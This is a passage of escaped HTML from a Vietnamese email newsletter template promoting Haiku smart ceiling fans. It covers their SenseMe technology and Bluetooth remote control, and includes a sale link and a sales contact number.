0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">Haiku \\u0111\\u00e3 gi\\u00e0nh \\u0111\\u01b0\\u1ee3c h\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng c\\u00f4ng ngh\\u1ec7 v\\u00e0 thi\\u1ebft k\\u1ebf. Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t theo ti\\u00eau chu\\u1ea9n ENERGY STAR\\u00ae, n\\u01a1i m\\u00e0 qu\\u1ea1t Haiku Fans \\u0111\\u00e3 chi\\u1ebfm t\\u1edbi 19 v\\u1ecb tr\\u00ed h\\u00e0ng \\u0111\\u1ea7u.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502718754-cambien_senseME.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\"><strong>C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<\\/strong><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\">B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502936864-sen_1.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503569736-bamboo-caramel.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" style=\\\"height:47px; v-text-anchor:middle; width:283px;\\\" arcsize=\\\"85%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e03e2d\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e03e2d; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM SHOP - SALE UP TO 15%<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Source Sans Pro\',sans-serif; font-size: 19px; font-weight: 700;\\\"><a rel=\\\"noopener\\\" href=\\\"tel:0932641255\\\" target=\\\"_blank\\\">Li\\u00ean h\\u1ec7 t\\u01b0 v\\u1ea5n b\\u00e1n h\\u00e0ng: <\\/a><a rel=\\\"noopener\\\" href=\\\"tel:0909899367\\\" target=\\\"_blank\\\">0909 899 367<\\/a><\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng n\\u00e2ng cao c\\u1ee7a Haiku v\\u1edbi \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa bluetooth cao c\\u1ea5p. \\u0110i\\u1ec1u ch\\u1ec9nh t\\u1ed1c \\u0111\\u1ed9 qu\\u1ea1t c\\u1ee7a b\\u1ea1n, thay \\u0111\\u1ed5i t\\u00f9y ch\\u1ecdn \\u00e1nh s\\u00e1ng ho\\u1eb7c s\\u1eed d\\u1ee5ng t\\u1ea5t c\\u1ea3 c\\u00e1c ch\\u1ebf \\u0111\\u1ed9 H\\u1eb9n gi\\u1edd, Xo\\u00e1y v\\u00e0 Ng\\u1ee7 m\\u00e0 kh\\u00f4ng c\\u1ea7n r\\u1eddi kh\\u1ecfi ch\\u1ed7 ng\\u1ed3i c\\u1ee7a b\\u1ea1n. N\\u1ebfu b\\u1ea1n lu\\u00f4n lu\\u00f4n m\\u1ea5t \\u0111\\u1ed3? \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m v\\u1edbi m\\u1ed9t gi\\u00e1 treo t\\u01b0\\u1eddng \\u0111\\u01a1n gi\\u1ea3n \\u0111\\u1ec3 \\u0111\\u1eb7t thu\\u1eadn ti\\u1ec7n v\\u00e0 an to\\u00e0n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677504582593-dieu-khien-haiku.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503408657-intergatehaiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503423701-remote_control.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #95a5a6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: 